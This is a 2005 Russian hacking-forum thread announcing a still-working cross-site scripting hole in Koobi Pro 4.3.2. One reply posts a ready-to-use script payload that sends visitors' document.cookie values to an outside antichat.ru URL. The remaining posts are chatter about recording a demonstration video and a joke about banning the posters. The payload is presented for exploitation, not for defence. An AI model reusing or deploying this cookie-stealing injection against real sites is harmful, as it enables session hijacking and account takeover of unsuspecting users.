Форум АНТИЧАТ - Межсайтовый скриптинг в koobi pro 4.3.2

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Межсайтовый скриптинг в koobi pro 4.3.2 (https://forum.antichat.xyz/showthread.php?t=9076)

KLez	27.08.2005 13:06

Межсайтовый скриптинг в koobi pro 4.3.2

Найденный уязвимость позволяет удаленныму пользователю своровать cookie пользователей.
Подробно читаем тут
PS. Бага пока реально пашет . КЕЗ если есть возможность сними видео =))) Я не стал т.к потом наехали бы на мой проект ...

Mastermind

31.08.2005 13:27

XSS:

Код:

"><script>i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;</script>

P.S. Только один вопрос: такой подход сработает во всех браузерах?

m0nzt3r

02.09.2005 23:25

а может я сниму видео? можно Клез?)

GreenBear

02.09.2005 23:29

да какое там видео... как в форму сплойт копировать...

k00p3r

03.09.2005 11:56

И вправду какое там ещё видео делать.....

DRON-ANARCHY

03.09.2005 13:47

Цитата:

И вправду какое там ещё видео делать.....

Как какое? про то, как

Цитата:

в форму сплойт копировать...

m0nzt3r

03.09.2005 16:31

как хотите)) а действительно чего сниматть то..

PinkPanther

03.09.2005 22:44

Да Вы заИПали флеймить уже. Всех в бан )))

Время: 07:19